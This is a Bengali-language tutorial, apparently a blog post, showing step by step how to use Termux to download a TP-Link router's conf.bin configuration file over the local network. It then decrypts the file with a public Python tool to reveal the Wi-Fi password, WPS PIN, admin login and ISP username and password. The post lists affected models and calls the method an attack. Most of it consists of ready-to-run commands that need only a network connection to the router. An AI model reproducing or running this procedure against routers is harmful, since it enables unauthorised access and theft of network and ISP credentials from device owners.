Howdy,
কেমন আছেন সবাই আশা করি ভালো আছেন। বরাবরের মতো আজকেও হাজির হলাম নতুন কিছু নিয়ে, তো আজকের আলোচনার টপিক কি সেটা হয়তো টাইটেল দেখে বুঝতে পারছেন চলুন শুরু করা যাক।
tp link এর conf.bin নিয়ে এক ভাইয়ের পোস্ট আছে চাইলে সেটা দখতে পারেন ।
এই পোস্টে বিস্তারিত বলা আছে বলে আমি তেমন কিছু বলবো না। কারণ আপনারা আমাদের লেখা গুলো না পরে শ স্কিনসর্ট গুলো চলে যায় ।
আজকে termux দিয়ে কিভাবে conf.bin ডাউনলোড করতে হয় সেটা দেখাবো সাথে যে ফাইলটি থাকবে সেটাকেও decrypt করবো তো চলুন শুরু করা যায় ।
বরাবরের মতো termux কে আপডেট করে নিবো।
pkg update -y
এখন গিট প্যাকেজ ইনস্টল দিবো।
pkg install git -y
Then wget প্যাকেজটি ইনস্টল দিবো। যেহেতু আমাদের ফাইলটি wget দিয়ে ডাউনলোড করবো ।
pkg install wget -y
এখন পাইথন প্যাকেজটি ইনস্টল দিবো । আমাদের decrypt করার টুলসটি পাইথন দিয়ে করা।
pkg install python -y
Conf.bin ফাইল decrypt করার জন্য দুইটি module লাগবে ।
pip install pycryptodome
এখন আমরা যে রাউটারের conf.bin ডাউনলোড করবো সেই রাউটারে কানেক্টেড হবো। এবং আমার দেওয়া কমান্ড কপি করে পেস্ট করে দিবেন ।
কমান্ট দেওয়া যাচ্ছে না তাই txt ফাইলে দিলাম
Download
মূল কথা হচ্ছে যারা লগইন আইপি পরিবর্তন করে রাখেন তাহলে পরিবর্তন করে যে আইপি দিছেন ঠিক সেইম আইপি দিতে হবে ।
মূল এখানে আপনার রাউটারের আইপটা দিবে। http://192.168.0.1/CGI/conf.bin সব ঠিক থাকবে শুধু আইপটা পরিবর্তন করবেন ,যদি আইপি পরিবর্তন থাকে তাহলে ।
কমান্ড রান করার সাথে সাথে এই রকম ইন্টার ফেইজ পাবেন দেখেন মার্ক করা আছে saving to : conf.bin ফাইল ডাউনলোড হয়েছে। যাদেরটা হবে না তাদের টা একটু অন্য রকম আসবে ।
এখন ls দিবো তাহলে দেখতে পারো conf.bin পেয়েছি কিনা।
এখন আমরা termux কে স্টোরেজ পারমিশন দিয়ে নিবো।
এখন conf.bin ফাইলটিকে ফোনে নিয়ে যাবো তার জন্য লিখবো
cp conf.bin /sdcard/
দেখতে পাচ্ছেন আমার ফোনে চলে আচ্ছে ।এখন আমাদের কাজ ফাইলটাকে decrypt করা।
এখন গিটহাব থেকে একটি টুলস ডাউনলোড দিবো ।
git clone https://github.com/sta-c0000/tpconf_bin_xml
এখন ls দিবো এবং ডাউনলোড করা ফোল্ডারের ভিতরে প্রবেশ করবো।
cd tpconf_bin_xml
এখন আমরা টুলসটি করবো এবং ফাইলটি decrypt করবো ।
python tpconf_bin_xml.py /sdcard/conf.bin 1.xml
Python পরে টুলসটির নাম থাকবে তারপর আমাদের ফাইলটি কোথায় আছে সেই location টা দিবো এবং আমরা কোন ফরমেটে decrypt করবো সেই ফরমেটের নাম দিবো ।
এখানে পাইথন টুলস
/sdcard/conf.bin এইটা আমাদের conf.bin ফাইলের লোকেশন
1.XML হচ্ছে যে ফরমেটে decrypt করবো ।
উপরে টুলসটি রান করার পর যাদের এই রকম error আসবে তাদের জন্য 2 নাম্বার module টা ইনস্টল করতে হবে।
২ নাম্বার module ইনস্টল দিবো।
pip install pycryptodomex
আবার ও আগের কমান্ড টি রান করবো তাহলে আর error আসবে না।
দেখতে পাচ্ছেন decrypt হয়ে গেছে । এখন ls দিবো তাহলে 1.XML নামে একটা ফাইল দেখতে পারবো ।
এখন আমরা 1.XML extract করবো তার জন্য লিখবো
cat 1.xml
Extract হলে এই রকম দেখতে পারো ।এখানে রাউটারের সব কিছু পেয়ে যাবে। প্রথম ছবি টা দেখেন এখানে কোন user name or pass নাই কারণ আমার রাউটেরর login panel যে default user or pass আছে সেটাই কোন পরিবর্তন করা হয়নি তাই এখানে কিছু আসে নাই।
যাদেরটা পরিবর্তন করা হবে তাদেরটা এখানে দেখতে পারবেন ।
দুই নাম্বার ছবিতে আমার রাউটারে wifi পাসওয়ার্ড এবং wps pin
মার্ক করা user or pass এইটা হচ্ছে আইএসপি user pass যার সাহায্যে আমরা নেট কানেকশন পাই।
তো দেখতেই পেলেন খুব সহজে একটি রাউটারের সব কিছু দেখতে পেলাম এই পোস্টের ভিডিওটি YouTube আপডেট করা হচ্ছে না চাইলে আপনারা আমার পেইজ থেকে দেখতে পারেন।
এই মেডট সব রাউটারে কাজ করবে না নিচের দেওয়া গুলোতে কাজ করবে ।
- TL-WR840N
- TL-WR841N
Some Other Routers of TP-LINK are also vulnerable of a similar kind of attack
- WL-WA850RE
তো আজ এই পর্যন্তই ভালো থাকবেন সুস্থ থাকবেন আল্লাহ হাফেজ ।